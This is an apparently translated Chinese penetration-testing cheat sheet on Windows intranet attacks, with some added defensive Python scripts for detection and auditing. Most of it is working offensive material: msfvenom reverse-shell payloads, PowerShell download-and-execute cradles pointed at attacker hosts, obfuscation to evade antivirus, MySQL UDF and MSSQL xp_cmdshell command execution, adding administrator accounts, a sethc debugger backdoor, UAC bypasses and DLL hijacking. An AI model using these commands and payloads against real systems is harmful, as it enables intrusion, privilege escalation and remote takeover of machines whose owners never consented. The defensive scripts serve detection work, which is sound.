
How do hackers break into websites? The world's first and most detailed Chinese penetration-testing article (Part 3)


This Wind


Intranet & Domain

Powershell

Check the version: $PSVersionTable

Remote execution

>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('');Invoke-xxx"


Loading an exe

Generate an exe trojan with msfvenom
#msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f exe > /var/www/html/1.exe
Use the Invoke-ReflectivePEInjection.ps1 script from PowerSploit
#powershell.exe -w hidden -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/clymberps/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.107/1.exe -ForceASLR" 

EXE2PS1

http://192.168.0.107/ps/powersploit/CodeExecution/Convert-BinaryToString.ps1
Convert the exe to base64
>Import-Module .\Convert-BinaryToString.ps1
>Convert-BinaryToString -FilePath .\ms15051.exe


http://192.168.0.107/ps/powersploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
Add the following at the top of Invoke-ReflectivePEInjection.ps1:
Function MS15051{
<#
.SYNOPSIS    
.EXAMPLE
C:\PS> MS15051 -Command "whoami"
#>
 [CmdletBinding()]
    param(
        [Parameter(Mandatory = $False)]
        [string]
        $Command
  )
$InputString = "文件的base64编码"
$PEBytes = [System.Convert]::FromBase64String($InputString)
Add the following at the end of the file:
write-host ("[+] Executing Command: "+$Command)  -foregroundcolor "Green"
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs $Command 
write-host ("[+] Done !")  -foregroundcolor "Green"
}


Remote download and execution
>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powersploit/CodeExecution/ms15051.ps1'); MS15051 –Command \"whoami\""


Bypassing the execution policy

>powershell Set-ExecutionPolicy Unrestricted    (requires administrator rights; scripts then run unrestricted)
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-xxx.ps1');invoke-xxx"
>powershell -exec bypass -File ./a.ps1
>Import-Module xxx

Base64

>use exploit/multi/script/web_delivery|target=2(PSH)
&
>cat payload.txt | iconv --to-code UTF-16LE |base64
>powershell -ep bypass -enc base64code

Bypass by writing a bat file

powershell -exec bypass -File ./a.ps1
Save this command as c.bat

Splitting the string and concatenating it again

powershell.exe  
"
$c1='powershell -c IEX'; 
$c2='(New-Object Net.WebClient).Downlo'; 
$c3='adString("http://192.168.197.192/a.ps1")'; 
echo ($c1,$c2,$c3) 
" 
First split the command into strings, then concatenate them. Replace echo with IEX to execute.
powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)

The Replace function

powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)" 

Bypass by splitting the http string

The http string can also be split; this bypasses in the same way
powershell "$a='IEX((new-object net.webclient).downloadstring("ht';$b='tp://192.168.197.192/a.ps1"))';IEX ($a+$b)"  
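As an added defender-side example (not part of the original post), the following Python sketch shows how the bypass forms above (-enc, split strings joined with +, .Replace() rewriting and the "ht"+"tp://" split) can be normalized back to the underlying download cradle before a detection rule is applied, so one rule covers every variant instead of one rule per trick. The command lines it runs on are constructed samples modelled on the ones in this section, using the 192.0.2.0/24 documentation range; the indicator names are my own.

```python
import base64
import re

# Constructed sample command lines (not from any real log), shaped like the bypass
# forms above: -enc, split strings joined with +, .Replace() rewriting and the
# "ht" + "tp://" split. 192.0.2.0/24 is a documentation range, not a real host.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
SAMPLE_COMMAND_LINES = [
    "powershell -ep bypass -enc "
    + base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii"),
    "powershell $c2='IEX (New-Object Net.WebClient).Downlo';"
    "$c3='adString(''http://192.0.2.10/a'')'; $Text=$c2+$c3; IEX(-join $Text)",
    "powershell -noexit \"$c1='IEX(New-Object Net.WebClient).Downlo';"
    "$c2='123(''http://192.0.2.10/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)\"",
    "powershell \"$a='IEX((new-object net.webclient).downloadstring(\"ht';"
    "$b='tp://192.0.2.10/a.ps1\"))';IEX ($a+$b)\"",
    "powershell -File C:\\scripts\\inventory.ps1",
]

ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
EXEC_POLICY_RE = re.compile(r"-e(?:p|xec|xecutionpolicy)\s+bypass", re.IGNORECASE)
# 'literal'.Replace('old','new') where the literal may contain '' escapes
REPLACE_RE = re.compile(r"'((?:[^']|'')*)'\.Replace\('([^']*)'\s*,\s*'([^']*)'\)", re.IGNORECASE)
LITERAL_RE = re.compile(r"'((?:[^']|'')*)'")


def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind -enc / -EncodedCommand, or None."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def resolve_replace(text):
    """Apply .Replace('old','new') calls made on string literals until none remain."""
    def apply(m):
        return "'" + m.group(1).replace(m.group(2), m.group(3)) + "'"
    prev = None
    while prev != text:
        prev, text = text, REPLACE_RE.sub(apply, text)
    return text


def splice_literals(text):
    """Join every single-quoted literal in order; this undoes $a+$b / -join splitting."""
    parts = LITERAL_RE.findall(text)
    if len(parts) < 2:
        return text
    return "".join(parts).replace("''", "'")


def triage(cmd):
    """Normalize one command line and return the indicators it triggers."""
    indicators = []
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        indicators.append("encoded-command")
        text = decoded
    resolved = resolve_replace(text)
    if resolved != text:
        indicators.append("replace-obfuscation")
        text = resolved
    spliced = splice_literals(text)
    if spliced != text:
        indicators.append("string-splicing")
        text = spliced
    low = text.lower()
    if ("iex" in low or "invoke-expression" in low) and ("downloadstring" in low or "webclient" in low):
        indicators.append("download-cradle")
    if EXEC_POLICY_RE.search(cmd):
        indicators.append("executionpolicy-bypass")
    return {"normalized": text, "indicators": indicators}


def triage_all(lines):
    """Return (command line, indicators) for every line that triggered something."""
    results = []
    for line in lines:
        verdict = triage(line)
        if verdict["indicators"]:
            results.append((line, verdict["indicators"]))
    return results


if __name__ == "__main__":
    for line, hits in triage_all(SAMPLE_COMMAND_LINES):
        print(", ".join(hits), "<-", line[:60])
```

The normalization is deliberately lossy: it only needs to be good enough for the cradle to reappear as a single string, which is why Script Block Logging (event 4104), which records the script after PowerShell has done the same reassembly for real, is the better data source where it is enabled; command-line normalization like this is the fallback for hosts that only ship 4688 or Sysmon events.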

AV evasion with an image

Invoke-PSImage.ps1 runs a PowerShell script hidden in an image: the payload is scattered across the pixels of the image, and when it is executed on the remote side the pixels are walked again to reassemble the payload and run it.
https://github.com/peewpw/Invoke-PSImage
A 1900*1200 image, x.jpg.
C:\>powershell
PS C:\> Import-Module .\Invoke-PSImage.ps1
PS C:\> Invoke-PSImage -Script .\a.ps1 -Image .\x.jpg -Out .\reverse_shell.png -Web
a.ps1 is the msf trojan; -Out writes the reverse_shell.png image; -Web prints a command that reads the image from the web.
Move reverse_shell.png to the web directory and replace the URL in that command. Then run it under powershell.

Loading shellcode

Generate a script trojan with msfvenom
#msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.72.164 LPORT=4444 -f powershell -o /var/www/html/test
Run the following commands on the Windows target
PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
PS >IEX(New-Object Net.WebClient).DownloadString("http://192.168.72.164/test")
Invoke-Shellcode -Shellcode $buf -Force    run the trojan
The Invoke-Shellcode.ps1 script executes the shellcode
and a meterpreter shell is returned

Loading a dll

Generate a dll trojan with msfvenom
>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.164 lport=4444 -f dll -o /var/www/html/test.dll
Upload the generated dll to the target's C: drive. Run the following on the target
PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")
Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden
Create a new process running Notepad, hidden
Invoke-DllInjection -ProcessID xxx -Dll c:\test.dll    use notepad's PID
Msf
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_tcp
#run

Windows Security Identifiers (SIDs)

Relative identifier   Description
500                   Administrator
501                   Guest
502                   Key Distribution Center service account
512                   Domain Admins
513                   Domain Users
514                   Domain Guests
515                   Domain Computers
516                   Domain Controllers
544                   Built-in Administrators
519                   Enterprise Admins
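An added example (not from the original post): parsing SIDs from an account listing and flagging the privileged RIDs from the table above. Two points the table does not spell out: RID 544 sits under the BUILTIN authority (S-1-5-32-544), not under a domain SID, and RID 500 still identifies the built-in administrator after the account has been renamed, which is why auditing by RID beats auditing by name. Account names and domain identifiers below are constructed.

```python
import re

# Domain-relative RIDs from the table above (SID shape S-1-5-21-<domain>-<RID>).
DOMAIN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "KDC service account",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers", 519: "Enterprise Admins",
}
# 544 is not a domain RID: the built-in Administrators group is S-1-5-32-544.
BUILTIN_RIDS = {544: "Administrators"}
PRIVILEGED = {"DOMAIN": {500, 502, 512, 516, 519}, "BUILTIN": {544}}

SID_RE = re.compile(r"^S-1-5-(?P<authority>21-\d+-\d+-\d+|32)-(?P<rid>\d+)$")

# Constructed account listing; names and domain identifiers are invented.
SAMPLE_ACCOUNTS = [
    ("svc-backup", "S-1-5-21-1111111111-2222222222-3333333333-1105"),
    ("ops_admin", "S-1-5-21-1111111111-2222222222-3333333333-500"),  # renamed built-in admin
    ("Domain Admins", "S-1-5-21-1111111111-2222222222-3333333333-512"),
    ("Administrators", "S-1-5-32-544"),
    ("broken", "S-1-5-21-x-500"),  # malformed, must not crash the audit
]


def parse_sid(sid):
    """Split a domain or BUILTIN SID into scope, RID, well-known name and privilege flag."""
    m = SID_RE.match(sid.strip())
    if not m:
        return None
    scope = "BUILTIN" if m.group("authority") == "32" else "DOMAIN"
    rid = int(m.group("rid"))
    table = BUILTIN_RIDS if scope == "BUILTIN" else DOMAIN_RIDS
    return {
        "scope": scope,
        "rid": rid,
        "name": table.get(rid),            # None for ordinary accounts (RID >= 1000)
        "privileged": rid in PRIVILEGED[scope],
    }


def find_privileged(entries):
    """Return the account names whose SID carries a privileged well-known RID."""
    hits = []
    for name, sid in entries:
        parsed = parse_sid(sid)
        if parsed and parsed["privileged"]:
            hits.append(name)
    return hits


if __name__ == "__main__":
    for name, sid in SAMPLE_ACCOUNTS:
        print(name, parse_sid(sid))
```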

Privilege escalation

Impacket toolkit

https://github.com/maaaaz/impacket-examples-windows
https://github.com/SecureAuthCorp/impacket
#git clone https://github.com/CoreSecurity/impacket.git 
#cd impacket/ 
#python setup.py install

Windows-exploit-suggester

#pip install xlrd --upgrade
#./windows-exploit-suggester.py --update
#./windows-exploit-suggester.py --database 20xx-xx-xx-mssb.xlsx --systeminfo systeminfo.txt

Wesng

https://github.com/bitsadmin/wesng
>systeminfo >1.txt
>python wes.py 1.txt


Searchsploit

Usage
>searchsploit <software> <version>
Look up common patches
https://bugs.hacking8.com/tiquan/
http://get-av.se7ensec.cn/index.php
https://patchchecker.com/checkprivs/
Query patches with wmic
wmic qfe list full|findstr /i hotfix
systeminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440  KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i  "%i"|| @echo %i Not Installed!)&del /f /q /a temp.txt
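An added example (not the post's own script): the KB check above reimplemented as a patch audit over systeminfo output, cross-referenced with the bulletin list that follows so that each missing KB is reported together with its bulletin. The systeminfo excerpt is constructed; the bulletin lines are copied from the list below, including the MS08-066 entry that has no KB and therefore cannot be checked this way.

```python
import re

# The KB list from the batch one-liner above.
REQUIRED_KBS = [
    "KB2271195", "KB2124261", "KB2160329", "KB2621440", "KB2707511", "KB2829361",
    "KB2864063", "KB3000061", "KB3045171", "KB3036220", "KB3077657", "KB3079904",
    "KB3134228", "KB3124280", "KB3199135",
]
KB_RE = re.compile(r"\bKB\d{6,7}\b", re.IGNORECASE)
# "MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)"
BULLETIN_RE = re.compile(r"^(?P<id>\S+)\s+\[(?P<kb>[^\]]*)\]\s+\[(?P<desc>[^\]]*)\]\s+\((?P<os>[^)]*)\)")

# Constructed systeminfo excerpt (host name and hotfix set are invented).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-LAB
OS Name:                   Microsoft Windows 7 Professional
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2160329
                           [02]: KB3000061
                           [03]: KB3199135
"""
# Bulletin lines copied from the list that follows this example.
SAMPLE_BULLETINS = """\
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)
MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS08-066 [] [] (Windows 2000/XP/Server 2003)
"""


def installed_kbs(systeminfo_text):
    """Every KB number mentioned in systeminfo (or wmic qfe) output, upper-cased."""
    return {m.group(0).upper() for m in KB_RE.finditer(systeminfo_text)}


def missing_kbs(systeminfo_text, required=REQUIRED_KBS):
    """Required KBs that do not appear in the output, in the order of the list."""
    have = installed_kbs(systeminfo_text)
    return [kb for kb in required if kb.upper() not in have]


def parse_bulletins(text):
    """Parse 'MSxx-xxx [KB] [description] (os)' lines; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = BULLETIN_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def missing_bulletins(systeminfo_text, bulletin_text):
    """Bulletin ids whose KB is absent. Entries without a KB cannot be checked this way."""
    have = installed_kbs(systeminfo_text)
    return [b["id"] for b in parse_bulletins(bulletin_text)
            if b["kb"] and b["kb"].upper() not in have]


if __name__ == "__main__":
    # An absent KB is a lead, not proof: later cumulative updates supersede older
    # packages, so confirm against the OS build before concluding anything.
    print("missing KBs:", missing_kbs(SAMPLE_SYSTEMINFO))
    print("bulletins to verify:", missing_bulletins(SAMPLE_SYSTEMINFO, SAMPLE_BULLETINS))
```

The same two functions work on `wmic qfe list full` output, since the KB regex only needs the KB token; Windows-exploit-suggester and wesng do the supersedence bookkeeping this script skips, which is why their verdicts differ from a raw KB diff on newer builds.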
MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8) 
CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008) 
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008) 
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP) 
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016) 
MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1) 
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1) 
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012) 
MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012) 
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012) 
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7) 
MS15-097 [KB3089656] [remote code execution] (win8.1/2012) 
MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012) 
MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012) 
MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012) 
MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012) 
MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8) 
MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2) 
MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8) 
MS14-070 [KB2989935] [Kernel Driver] (2003) 
MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8) 
MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8) 
MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8) 
MS14-002 [KB2914368] [NDProxy] (2003/XP) 
MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7) 
MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7) 
MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8) 
MS12-042 [KB2972621] [Service Bus] (2008/2012/win7) 
MS12-020 [KB2671387] [RDP] (2003/2008/7/XP) 
MS11-080 [KB2592799] [AFD.sys] (2003/XP) 
MS11-062 [KB2566454] [NDISTAPI] (2003/XP) 
MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP) 
MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista) 
MS10-092 [KB2305420] [Task Scheduler] (2008/7) 
MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5) 
MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista) 
MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7) 
MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP) 
MS10-012 [KB971468] [SMB Client Trans2 stack overflow] (Windows 7/2008R2) 
MS09-050 [KB975517] [Remote Code Execution] (2008/Vista) 
MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0) 
MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista) 
MS08-068 [KB957097] [Remote Code Execution] (2000/XP) 
MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008) 
MS08-066 [] [] (Windows 2000/XP/Server 2003) 
MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista) 
MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000) 
MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)

Activate the guest account

>net user guest /active:yes

MYSQL udf

Udf: sqlmap-master\udf\mysql\windows\
>python sqlmap/extra/cloak/cloak.py lib_mysqludf_sys.dll _
MySQL > 5.1: place udf.dll in lib\plugin
MySQL < 5.1: place udf.dll in c:\windows\system32
#show variables like '%compile%';    check the system version
#select @@plugin_dir    check the plugin directory
Write the udf
#select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll"; 
Or hex-encode the udf and write it out
#select hex(load_file('udf_sys_64.dll')) into dumpfile '/tmp/udf.hex'; 
#select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000… into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
Or base64-encode the udf and write it out (MySQL 5.6.1 and MariaDB 10.0.5)
#select to_base64(load_file('/usr/udf.dll')) into dumpfile '/tmp/udf.b64';
#select from_base64("xxxxx") into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
Or create a table and concatenate the hex encoding
#create table temp(data longblob); 
#insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d); 
#update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b3); 
#select data from temp into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
Or: #insert into temp(data) values(hex(load_file('D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll')));
#SELECT unhex(cmd) FROM mysql.temp INTO DUMPFILE 'D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll ';
Or use fast data import
#load data infile '\\\\192.168.0.19\\network\\udf.hex'
#into table temp fields terminated by '@OsandaMalith' lines terminated by '@OsandaMalith' (data); 
#select unhex(data) from temp into dumpfile 'D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll';
Create the functions
#create function cmdshell returns string soname 'udf.dll';
#create function sys_exec returns int soname 'udf.dll';
Execute commands
#select cmdshell('whoami');
#select sys_exec('whoami');
Drop the functions
#drop function cmdshell;
#drop function sys_exec;
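Added defensive example (not from the original post): the UDF technique above leaves two artifacts a DBA can audit, a row in mysql.func whose dl points at a library that should not be there, and INTO DUMPFILE / CREATE FUNCTION ... SONAME statements in the general query log. The plugin directory, the allowlist of expected libraries, the mysql.func rows and the log lines below are all constructed; the UDF names checked are the ones this section uses.

```python
import re

# UDF names this page uses for command execution; a row with one of these in
# mysql.func is a strong signal on its own.
SUSPECT_UDF_NAMES = {"sys_exec", "cmdshell", "do_system"}
# Assumed deployment values (constructed): the server's @@plugin_dir and the set of
# UDF libraries the site actually ships.
PLUGIN_DIR = "/usr/lib/mysql/plugin"
EXPECTED_LIBRARIES = {"site_udf.so"}

# Constructed rows shaped like `select name, ret, dl, type from mysql.func`.
SAMPLE_FUNC_ROWS = [
    ("site_hash", 0, "site_udf.so", "function"),
    ("sys_exec", 2, "udf.so", "function"),
    ("do_system", 2, "raptor_udf2.so", "function"),
    ("geo_dist", 1, "geo.so", "function"),
]
# Constructed general_log lines (the sequence mirrors the steps above).
SAMPLE_GENERAL_LOG = """\
2024-03-01T10:00:00.000000Z   12 Query  select @@plugin_dir
2024-03-01T10:00:02.000000Z   12 Query  select 0x4d5a9000 into dumpfile '/usr/lib/mysql/plugin/udf.so'
2024-03-01T10:00:05.000000Z   12 Query  create function sys_exec returns int soname 'udf.so'
2024-03-01T10:00:09.000000Z   12 Query  select sys_exec('id')
2024-03-01T10:01:00.000000Z   13 Query  select count(*) from orders
"""

DUMPFILE_RE = re.compile(r"into\s+dumpfile\s+'([^']+)'", re.IGNORECASE)
CREATE_FUNC_RE = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'",
    re.IGNORECASE)


def audit_func_table(rows, allowlist=EXPECTED_LIBRARIES):
    """Flag mysql.func rows by name (known exec UDF) or by library (not on the allowlist)."""
    findings = []
    for name, _ret, dl, _type in rows:
        if name.lower() in SUSPECT_UDF_NAMES:
            findings.append((name, "known command-execution UDF"))
        elif dl not in allowlist:
            findings.append((name, "library not in allowlist"))
    return findings


def audit_general_log(text, plugin_dir=PLUGIN_DIR):
    """Flag statements that write into the plugin directory or register a native UDF."""
    findings = []
    prefix = plugin_dir.rstrip("/") + "/"
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DUMPFILE_RE.search(line)
        if m and m.group(1).startswith(prefix):
            findings.append((lineno, "dumpfile-into-plugin-dir"))
        if CREATE_FUNC_RE.search(line):
            findings.append((lineno, "create-function-soname"))
    return findings


if __name__ == "__main__":
    print(audit_func_table(SAMPLE_FUNC_ROWS))
    print(audit_general_log(SAMPLE_GENERAL_LOG))
```

On a Windows server the dumpfile path will use backslashes and mixed case, so normalize both sides before the prefix comparison. The structural fix is the one the page's own commands imply: the account the application uses should not hold FILE or CREATE ROUTINE on mysql, and the plugin directory should not be writable by the mysqld user, which makes the whole chain fail at the dumpfile step; `secure_file_priv` set to a directory outside the plugin path has the same effect for the LOAD DATA / dumpfile variants.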

MYSQL Linux Root

https://0xdeadbeef.info/exploits/raptor_udf2.c
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
$ mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
name ret dl type
do_system 2 raptor_udf2.so function
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

MSSQL

Enable xp_cmdshell

xp_cmdshell

#exec sp_configure 'show advanced options', 1;reconfigure; 
#exec sp_configure 'xp_cmdshell',1;reconfigure;
#exec master.dbo.xp_cmdshell 'ipconfig'

xp_regwrite

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

xp_dirtree

execute master..xp_dirtree 'c:'      -- list all files and directories under c:\, including subdirectories
execute master..xp_dirtree 'c:',1    -- list only the folders directly under c:\
execute master..xp_dirtree 'c:',1,1  -- list folders and files directly under c:\

sp_oacreate

exec sp_configure 'show advanced options', 1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;
Execute commands
declare @shell int 
exec sp_oacreate 'wscript.shell',@shell output 
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123 123 /add'
declare @shell int 
exec sp_oacreate 'wscript.shell',@shell output 
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123/add'
Delete a file
declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token
Copy a file
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'
Move a file
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\2.txt'

Sandbox execution

Enable the sandbox:
>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Execute:
>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

WarSQLKit (backdoor)

http://eyupcelik.com.tr/guvenlik/493-mssql-fileless-rootkit-warsqlkit

MSF

Enumerate patches
#use post/windows/gather/enum_patches
List usable exploits
#use post/multi/recon/local_exploit_suggester

Bypass UAC

MSF

>use exploit/windows/local/bypassuac 
>use exploit/windows/local/bypassuac_injection
>use exploit/windows/local/bypassuac_vbs
>use exploit/windows/local/bypassuac_fodhelper
>use exploit/windows/local/bypassuac_eventvwr
>use exploit/windows/local/bypassuac_comhijack

DccwBypassUAC

Use on win10&win8


K8uac

>k8uac.exe xx.exe
>k8uac.exe "command"

CMSTP

Set the UAC and AppLocker rules

Generate a malicious DLL with MSF and upload it to the target
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/cm.dll


Create run.inf in the same directory as the DLL. RegisterOCXSection gives the DLL location, which can also be a remote WebDAV path,
e.g. \\192.168.0.107\webdav\cm.dll
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\y.SUB2K8\Desktop\cm.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="cmstp"
ShortSvcName="cmstp"
Running the command bypasses UAC and AppLocker and the session comes back
>cmstp /s run.inf


Uacme

Includes more than 50 bypass methods, among them DLL hijacking and COM hijacking
https://github.com/hfiref0x/UACME


Compile with Visual Studio
Visual Studio 2013v120;
Visual Studio 2015v140;
Visual Studio 2017v141;
Visual Studio 2019v142。
Currently 59 bypassuac methods in total
Usage:
>akagi.exe 1
>akagi.exe 1 c:\windows\system32\cmd.exe
>akagi.exe 1 "net user 1 1 /add"
Note:
Methods 5 and 9 affect the target's security, use with care; 5 requires a reboot
Method 6 is not available on x64 from win8 onwards
Methods 11 and 54 support x32 only
Methods 13, 19, 30 and 50 support x64 only
Method 14 requires process injection; on x64 use the x64 build of the tool

Bypass-UAC

https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC
>Bypass-UAC -Method UacMethodSysprep


Methods:
UacMethodSysprep
ucmDismMethod
UacMethodMMC2
UacMethodTcmsetup
UacMethodNetOle32

DLL hijack

The order in which a program looks up a DLL when it runs:
1. The directory the program was loaded from
2. The system directory, i.e. SYSTEM32
3. The 16-bit system directory, i.e. SYSTEM
4. The Windows directory
5. The current directory at the time the DLL is loaded
6. The directories listed in the PATH environment variable
Use
https://docs.microsoft.com/zh-cn/sysinternals/downloads/sigcheck
to check whether a program runs with high privileges
>sigcheck.exe -m c:\1.exe
Check whether autoElevate is true


Use Process Monitor to view the DLLs the program loads when it runs. Find a DLL that is not in the
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs list and whose folder is readable and writable by the current user; then generate a malicious dll, back up the original DLL, replace it, and run the program again to complete the hijack.

SilentCleanup

